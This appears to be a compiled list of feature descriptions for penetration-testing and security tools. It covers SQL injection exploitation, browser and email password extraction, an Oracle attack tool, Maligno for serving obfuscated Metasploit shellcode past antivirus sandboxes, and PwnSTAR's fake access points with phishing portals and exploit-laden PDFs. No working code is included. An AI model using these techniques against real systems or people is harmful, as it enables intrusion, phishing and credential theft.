HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.
It works on Linux and Windows running the following:
Requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
Smart Pentester is an SSH based Penetration Testing Framework. It provides a GUI for well known tools like nmap, hping, tcpdump, volatility, hydra and etc.
Smart Pentester Framework will provide you a User Interface for Penetration testing, Malware Analysis, Forensic Analysis, Cyber Intelligence, Advanced packet generation techniques and more...
Smart SPLAT is a freeware software to troubleshoot Checkpoint firewall issues and perform management tasks.
It periodically checks for an update and when a new release is published, updates itself via the SmartSPLAT web site.
SmartSPLAT lets you connect to your firewall via secure channel SSH
Critical commands like cpstop, kill, reboot and etc. deleting a license or similar commands that can cause your firewall not to function properly are colored red protected by checkboxes and shows confirmation dialogs.
In this project we have used an ssh Library based on the Poderosa project.
For file transfer operations, SmartSPLAT uses putty pscp.exe, to work with SCP /etc/scpusers/ file should be modified.
Smart SPLAT has a script named preparescp. It checks if user exists at /etc/scpusers/ if not, adds a line for it.
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Features
Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Exploits SQL Injections through GET/POST/Cookie parameters.
Developed in python 3.
Exploits SQL Injections that return binary data.
Powerful command interpreter to simplify its usage.
Dradis is an open source framework to enable effective information sharing, specially during security assessments. It’s a tool specifically to help in the process of penetration testing. Penetration testing is about information:
Information discovery
Exploit useful information
Report the findings
But penetration testing is also about sharing the information you and your teammates gather. Not sharing the information available in an effective way will result in exploitation opportunities lost and the overlapping of efforts.
Dradis is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead.
Features
Easy report generation.
Support for attachments.
Integration with existing systems and tools through server plugins.
Platform independent.
Traditional pentesting teams face different types of challenges regarding information sharing. Different tools provide output in different formats, different testers capture evidence in different ways, different companies report differently, etc.
If you do not use a tool to share the information, every tester will use their own notes file to keep track of their findings. Each will store this file locally, or on a shared resource, but the information will not arrive immediately to the rest of the team.
If you want to know what are the latest findings of your mate, you will need to look for the notes file. You also can try talking, but talking is not that effective when you need to know a specific cookie value or a sql query for an injection attack.
It seems reasonable that some effort must be put to increase the quality and efficiency of this process.
Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission.
Changelog: Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation.
Features
Encrypted communications: Maligno is a web server which communicates via HTTP or HTTPS with the clients. Communications are encrypted with AES and encoded with Base64 both for HTTP and HTTPS. Encryption and encoding parameters can be configured. Clients do NOT validate the server certificate by default.
On the fly shellcode generation – per session mode: Maligno will generate shellcode while starting up, and it will cache it for later use. Maligno will serve the cached shellcode to all clients that request it during the session. Maligno will maintain a cache for each configured Metasploit payload. The cache is removed when Maligno is shut down.
Multi-payload support: You may configure Maligno with several Metasploit payloads. Clients can request different payloads to the server. Payloads are referred by an index, which is passed as a GET parameter. Such parameter can be also configured.
Multi-server support: Maligno can run on a single server with Metasploit or in separate machines. Clients will connect to Maligno, and Maligno will generate shellcode that points to a pre-configured Metasploit multi-handler.
SOCKS4a proxy support: Maligno helps you starting a Metasploit auxiliary socks4a proxy, which can be used with payloads such as reverse_https_proxy. This will allow you to send all your traffic through your Maligno server, in case of having a multi-server environment.
Scope definition: Maligno allows you to define single IP addresses or ranges. This will ensure that your shellcode is served only to machines involved in your pentest. You may also use a wildcard in order to accept ANY address.
Last resort redirection: Maligno will redirect hosts out of scope, or hosts sending invalid requests, to a configured URL.
Client code generator and pseudorandom obfuscator: Maligno comes with a script that will generate and obfuscate (pseudorandomly) client code ready for use, based on your server configuration.
Delayed client execution: Maligno clients use a basic random execution delay, which attempts to bypass AV-sandboxes.
Metasploit resource file generator: Maligno generates MSF resource files based on your configuration, which can be used with msfconsole right away.
OAuth Request Crafter is a tool that helps you to play with OAuth signature protected URLs. Features
Support GET,POST,PUT and DELETE
Proxy the Request
Tamper URL, Parameters & Headers on the GO
Add additional Headers and Cookie
Why ?
When dealing with OAuth signature protected URLs, For tampering or issuing a request, Everytime you have to use some tool to generate a valid signature and nonce protected parameters and add it to your proxy to make a successful request.
This is a pain since you have to do this manually for every single request.
OAuth Request Crafter will solve that problem by automating everything.
Provide it with CONSUMER KEY and CONSUMER SECRET and OAUTH TOKEN AND TOKEN SECRET (optional)
Make Request tamper the URL, Parameters and Headers on the Go.
WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.
After retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the 'Save Selected Items' option (Ctrl+S).
System Requirements And Limitations
This utility works on any version of Windows, starting from Windows 2000, and up to Windows 8, including 64-bit systems. Older versions of Windows (Windows 98/ME) are not supported, because this utility is a Unicode application.
Currently, WebBrowserPassView cannot retrieve the passwords if they are encrypted with a master password. Support for master password will probably be added in future versions.
Currently, WebBrowserPassView cannot retrieve passwords from external hard-drive. Support for that might be added in future versions.
On Internet Explorer 7.0-9.0, the passwords are encrypted with the URL of the Web site, so WebBrowserPassView uses the history file of Internet Explorer to decrypt the passwords. If you clear the history of Internet Explorer, WebBrowserPassView won't be able to decrypt the passwords.
On Google Chrome - passwords originally imported from Internet Explorer 7.0-9.0, cannot be decrypted.
OWASP iOSForensic is a python tool to help in forensics analysis on iOS. It get files, logs, extract sqlite3 databases and uncompress .plist files in xml.
OWASP iOSForensic provides:
Application's files
Conversion of .plist files in XML
Extract all databases
Conversion of binary cookies
Application's logs
A List of all packages
Extraction multiple packages
Options
-h --help : show help message
-a --about : show informations
-v --verbose : verbose mode
-i --ip : local ip address of the iOS terminal
-p --port : ssh port of the iOS terminal (default 22)
-P --password : root password of the iOS terminal (default alpine)
Daphne is a small application for killing, controlling and debugging Windows’ processes. It was born to kill a windows process and became almost a task manager replacement. You can kill a process by dragging the mouse over the windows, by right-clicking the process in the main process list, or by typing its name with the “Kill all by name” command. You can set a any window to be always on top, to be transparent, to be enable, et cetera. Although Daphne was born just to kill windows process. You can think of Daphne as a task manager replacement. The main window displays a list of currently running process with detailed information about: CPU usage, Process ID, Process name, Full path (and arguments), Priority, Class (Process / Service), Current memory usage, Peek memory usage, Current swap usage, Peek swap usage and Number of threads.
You can hide applications, hack programs GUI, and inspect deep process information.
New in Daphne v2.02:
Copy process list to clipboard in CSV format
Explorer integration add extras
Set window size using numbers (ie. 640x648)
Trap window size and position
Schedule popup message
Hanlde min/max process working set size
Drag and dro to find window in process windows tree
Fix: Explorer integration: 'Open CMD' shows over folder and files now
Fix: Installer takes care of removing previous version automatically
Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
Features
Wireshark has a rich feature set which includes the following:
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
Capture files compressed with gzip can be decompressed on the fly
Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
Coloring rules can be applied to the packet list for quick, intuitive analysis
Output can be exported to XML, PostScript®, CSV, or plain text
Browser Password Remover is the free software to quickly display and remove all the stored website login passwords from popular browsers.
Most of the web browsers allow users to remember passwords and stores them into local database file. This file and all the stored passwords within it can be accessed by any one logged into the system. This is very risky especially on shared computers as well as on public systems such as in internet cafe.
Browser Password Remover helps you to automatically list and remove any such stored passwords from all the popular browsers.
Here are the currently supported web browsers,
Firefox
Internet Explorer [v7.x - v10.x]
Google Chrome
Google Chrome Canary/SXS
CoolNovo Browser
Opera Next
Comodo Dragon Browser
SeaMonkey Browser
SRWare Iron Browser
Flock Browser
One of the unique feature of this tool is that it allows you to remove the stored login passwords from any User on the local system or any other computer.
Before removing the passwords, you can also take a Backup of recovered password in HTML/XML/TEXT format.
Browser Password Remover is fully Portable and works on both 32-bit/64-bit platforms starting from Windows XP to Windows 8.
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that test the security of Oracle Databases remotely. Usage examples of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)
Features Thanks to ODAT, you can:
search valid SID on a remote Oracle Database listener via:
a dictionary attack
a brute force attack
ALIAS of the listener
search Oracle accounts using:
a dictionary attack
each Oracle user like the password (need an account before to use this attack)
execute system commands on the database server using:
DBMS_SCHEDULER
JAVA
external tables
oradbg
download files stored on the database server using:
UTL_FILE
external tables
CTXSYS
upload files on the database server using:
UTL_FILE
DBMS_XSLPROCESSOR
DBMS_ADVISOR
delete files using:
UTL_FILE
send/reveive HTTP requests from the database server using:
UTL_HTTP
HttpUriType
scan ports of the local server or a remote server using:
A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables. Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.
Usage
Basic Menu
1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc no internet access given
2) Grab WPA handshake
3) Sniffing: provide internet access, then be MITM
4) Simple web server with dnsspoof: redirect the victim to your webpage
5) Karmetasploit
6) Browser_autopwn
1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it. Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi
2) Sometimes it is quicker to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target. Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.
3) Provides an open network, so you can sniff the victim's activities.
4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details. Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof. DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a much better way of hosting hotspot_3
5&6) Provides all the config files to properly set-up Karmetasploit and Browser_autopwn.
Advanced Menu
a) Captive portals (phish/sniff)
b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)
c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
d) Java_jre17_jmxbean
e) Choose another browser exploit
a) Uses iptables rules to route the clients. This is a fully functioning captive portal, and can track and block/allow multiple connections simultaneously. Avoids the problems of dns-spoofing. There are two built-in web options:
1) Serves hotspot3. Does not allow clients onto the internet until credentials have been given.
2) Allows you to add a personal header to the index.php. You could probably copy the php functions from this page onto a cloned page, and load that instead.
b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet. Includes a virgin pdf to which you can add your own payload.
c&d) Launches a couple of example browser exploits
e) Gives a skeleton framework for loading any browser exploit of your choice. Edit PwnSTAR browser_exploit_fn directly for more control.
SysExporter utility allows you to grab the data stored in standard list-views, tree-views, list boxes, combo boxes, text-boxes, and WebBrowser/HTML controls from almost any application running on your system, and export it to text, HTML or XML file.
Here's some examples for data that you can export with SysExporter:
The files list inside archive file (.zip, .rar, and so on) as displayed by WinZip or 7-Zip File Manager.
The files list inside a folder.
The event log of Windows.
The list of emails and contacts in Outlook Express.
The Registry values displayed in the right pane of the Registry Editor.
The data displayed by SysInternals utilities (Registry Monitor, File Monitor, Process Explorer, and others.)
The text inside a standard message-box of Windows.
The HTML inside any instance of Internet Explorer.
Using SysExporter
This utility is a standalone executable, so it doesn't require any installation process or additional DLLs. Just run the executable (sysexp.exe) and start using it. There is only one exception: If you want to run this utility on Windows NT, you should download the 'psapi.dll', and copy it into the system32 folder. The main window of SysExporter contains 2 panes:
The upper pane displays the list of current opened windows that are available for export.
When you select a single window in the upper pane, the lower pane displays all data that you can export from the selected window. For example: If you select the 'My computer' window in the upper pane, the lower pane will display the list of all your disks, and they are displayed in the original 'My Computer' window.
You can easily select one or more items from the lower pane, and then export them to text, HTML or XML files. You can also copy the exported data to the clipboard in tab-delimited format (Ctrl+C), and then paste it directly to Excel or any other application that supports this format. Before exporting the data, you can change the order of columns that will be appeared in the saved files by using the 'Choose Columns' option.
Practical Example
Let's say that you want to export the list of all files in your C:\Windows folder to Excel:
First, open the 'C:\Windows' folder (or any other folder that you want to export).
In the top pane of SysExporter, find the window of 'C:\Windows' folder and select it. If you cannot find this window, try to refresh the list by pressing F5 key.
After selecting the desired window in the top pane, the files list of this window will be loaded to the lower pane.
Select the files in the lower pane that you want to export. (Press Ctrl+A in order to select all files)
Press Ctrl+C in order to copy the selected items to the clipbaord. (The exported items are copied in tab-delimited format)
In Excel, go the position that you want to put the exported data, and then press Ctrl+V to paste the exported data into your Excel worksheet.
Mail Password Decryptor is the FREE software to instantly recover Mail Account passwords from popular email clients and other desktop applications.
You can recover your lost password for email accounts like Gmail, Yahoo Mail, Hotmail or Windows Live Mail from email applications such as Microsoft Outlook, Thunderbird, IncrediMail, GTalk & many more.
Mail Password Decryptor automatically crawls through each of these applications and instantly recovers all of the stored mail account passwords.
It is very handy tool not only for for Penetration testers but also for Forensic investigators.
It works on both 32-bit & 64-bit platforms starting from Windows XP to latest operating system Windows 8.
Features
Current version support password recovery from following Popular email clients & desktop apps
Microsoft Outlook Express
Microsoft Outlook 2002/XP/2003/2007/2010/2013
Mozilla Thunderbird
Windows Live Mail 2012
IncrediMail
Foxmail v6.x - v7.x
Windows Live Messenger
MSN Messenger
GTalk
GMail Notifier
PaltalkScene IM
Pidgin (Formerly Gaim) Messenger
Miranda Messenger
Windows Credential Manager
Here are the unique features
Automatically detect and decrypt stored encrypted passwords from popular email clients & desktop applications.
Password Recovery from latest versions of supported applications.
Recover password of any length and complexity.
Automatically discovers all supported Applications and recovers all the stored passwords.
Save the recovered password list to HTML/XML/Text/CSV file
Easier and faster to use with its enhanced user friendly GUI interface.
Support for local Installation and uninstallation of the software.
screenFetch is a "Bash Screenshot Information Tool". This handy Bash script can be used to generate one of those nifty terminal theme information + ASCII distribution logos you see in everyone's screenshots nowadays. It will auto-detect your distribution and display an ASCII version of that distribution's logo and some valuable information to the right. There are options to specify no ascii art, colors, taking a screenshot upon displaying info, and even customizing the screenshot command! This script is very easy to add to and can easily be extended.
Running screenfetch
To run screenFetch, open a terminal of some sort and type in the command screenFetchor wherever you saved the script to. This will generate an ascii logo with the information printed to the side of the logo. There are some options that may be specifiedon the command line, and those are shown below or by executing screenFetch -h:
-v Verbose output. -o 'OPTIONS' Allows for setting script variables on the command line. Must be in the following format... 'OPTION1="OPTIONARG1";OPTION2="OPTIONARG2"' -n Do not display ASCII distribution logo. -N Strip all color from output. -t Truncate output based on terminal width (Experimental!). -s(m) Using this flag tells the script that you want it to take a screenshot. Use the -m flag if you would like to move it to a new location afterwards. -c string You may change the outputted colors with -c. The format is as follows: [0-9][0-9],[0-9][0-9]. The first argument controls the ASCII logo colors and the label colors. The second argument controls the colors of the information found. One argument may be used without the other. -S 'COMMAND' Here you can specify a custom screenshot command for the script to execute. Surrounding quotes are required. -D 'DISTRO' Here you can specify your distribution for the script to use. Surrounding quotes are required. -A 'DISTRO' Here you can specify the distribution art that you want displayed. This is for when you want your distro detected but want to display a different logo. -E Suppress output of errors. -V Display current script version. -h Display this help.
Moscrack is a perl application designed to facilitate cracking WPA keys in parallel on a group of computers.
This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes.
With Moscrack's new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin.
Some of Moscrack's features:
Basic API allows remote monitoring
Automatic and dynamic configuration of nodes
Live CD/USB enables boot and forget dynamic node configuration
Can be extended by use of plugins
Uses aircrack-ng (including 1.2 Beta) by default
CUDA/OpenCL support via Pyrit plugin
CUDA support via aircrack-ng-cuda (untested)
Does not require an agent/daemon on nodes
Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin
Checkpoint and resume
Easily supports a large number of nodes
Desgined to run for long periods of time
Doesn't exit on errors/failures when possible
Supports mixed OS/protocol configurations
Supports SSH, RSH, Mosix for node connectivity
Effectively handles mixed fast and slow nodes or links
Architecture independent
Supports Mosix clustering software
Supports all popular operating systems as processing nodes
Node prioritization based on speed
Nodes can be added/removed/modified while Moscrack is running
Failed/bad node throttling
Hung node detection
Reprocessing of data on error
Automatic performance analysis and tuning
Intercepts INT and TERM signals for clean handling
Very verbose, doesn't hide anything, logs agressively
Includes a "top" like status viewer
Includes CGI web status viewer
Includes an optional basic X11 GUI
Compatibility
Moscrack itself should work with any Un*x variant, but it is developed and tested on Linux.
Tested platforms for SSH based end nodes:
Moscrack Live CD (SUSE)
Ubuntu Linux 12.10 x86 64bit
Ubuntu Linux 12.04.2 x86 64bit
Ubuntu Linux 10.10 x86 64bit
Ubuntu Linux 10.10 x86 32bit
CentOS Linux 5.5 x86 32bit
FreeBSD 8.1 x86 64bit
Windows Vista Business 64bit w/Cygwin 1.7.7-1
Windows Vista Business 64bit w/Cygwin 1.7.9
Mac OS X 10.5.6 (iPC OSx86)
Solaris Express 11 x64
iPhone 3g iOS 3.2.1 (Jailbroken)
Samsung Galaxy S2 SGH-I727R (Cyanogenmod 10 + Linux chroot)
WhoIsConnectedSniffer is a network discovery tool that listens to network packets on your network adapter using a capture driver (WinpCap or MS network monitor) and accumulates a list of computer and devices currently connected to your network. WhoIsConnectedSniffer uses various protocols to detect the computers connected to your network, including ARP, UDP, DHCP, mDNS, and BROWSER.
For every detected computer or device, the following information is displayed: (Some of the fields might be empty if the information cannot be found inside the packets) IP Address, MAC Address, name of the device/computer, description, Operating System, Network Adapter Company, IPv6 Address.
After collecting the connected computers/devices information, you can easily export the list to tab-delimited/comma-delimited/xml/html file.
Start Using WhoIsConnectedSniffer
Except of the capture driver, WhoIsConnectedSniffer doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - WhoIsConnectedSniffer.exe
After running WhoIsConnectedSniffer in the first time, you should choose the correct capture driver and the network adapter you want to use.
After you choose the desired capture driver and the network adapter, WhoIsConnectedSniffer starts to listen the packets on your network adapter and updates the main window when a device or computer is detected.
You have to wait from a few seconds to a few minutes until the first computers/devices appear on the main window of WhoIsConnectedSniffer.
After collecting the connected computers/devices information, you can easily export the list to tab-delimited/comma-delimited/xml/html file by selecting all items (Ctrl+A), and then using the 'Save Selected Items' option (Ctrl+S).
Protocols supported by WhoIsConnectedSniffer
ARP:WhoIsConnectedSniffer listens to this protocol to get the IP address and MAC address of computers and devices.
UDP:When a computer broadcasts a UDP packet to all other computers, WhoIsConnectedSniffer extracts from it the IP address and the MAC address.
DHCP:When a computer connects to the network, it usually sends a DHCP request. WhoIsConnectedSniffer uses this request to get the host name and IP address of the computer.
mDNS:This protocol is used on Linux and Mac OS systems. WhoIsConnectedSniffer uses it to get the host name and IP address of the computer, and also the operating system (on Linux)
BROWSER:This protocol is mainly used by Windows, but some Linux systems supports this protocol too. WhoIsConnectedSniffer uses it to get the name of the computer, description text of the computer, and the operating system.
Egresser is a tool to enumerate outbound firewall rules, designed for penetration testers to assess whether egress filtering is adequate from within a corporate network. Probing each TCP port in turn, the Egresser server will respond with the client’s source IP address and port, allowing the client to determine whether or not the outbound port is permitted (both on IPv4 and IPv6) and to assess whether NAT traversal is likely to be taking place.
How it Works
The server-side script works in combination with Iptables - redirecting all TCP traffic to port 8080 where the ‘real’ server resides. The server-side script is written in Perl and is a pre-forking server utilising Net::Server::Prefork, listening on both IPv4 and IPv6 if available. Any TCP connection results in a simple response containing a null terminated string made up of the connecting client’s IP and port. Feel free to use Telnet to interact with the service if you are in a restricted environment without access to the Egresser client (our Egresser server can be found at egresser.labs.cyberis.co.uk, which you are free to use for legitimate purposes).
The client is also written in Perl and is threaded for speed. By default it will scan TCP ports 1-1024, although this is configurable within the script. It is possible to force IPv4 with the ‘-4’ command line argument, or IPv6 with ‘-6’; by default it will choose the protocol preferred by your operating system. If you want to explicitly list all open/closed ports, specify the verbose flag (-v), as normal output is a concise summary of permitted ports only.
Why?
It is recommended that outbound firewall rules are restricted within corporate environments to ensure perimeter controls are not easily circumvented. For example, inadequate egress filtering within an organisation would allow a malicious user to trivially bypass a web proxy providing filtering/AV/logging simply by changing a browser’s connection settings. Many other examples also exist - many worms spread over SMB protocols, malware can use numerous channels to exfiltrate data, and potentially unauthorised software (e.g. torrent/P2P file sharing) can freely operate, wasting corporate resources and significantly increasing the likelihood of malicious code being introduced into the environment.
Generally, it is recommended that all outbound protocols should be restricted, allowing exceptions from specific hosts on a case-by-case basis. Web browsing should be conducted via dedicated web proxies only, with any attempted direct connections logged by the perimeter firewall and investigated as necessary.
Egresser is a simple to use tool to allow a penetration tester to quickly enumerate allowed ports within a corporate environment.
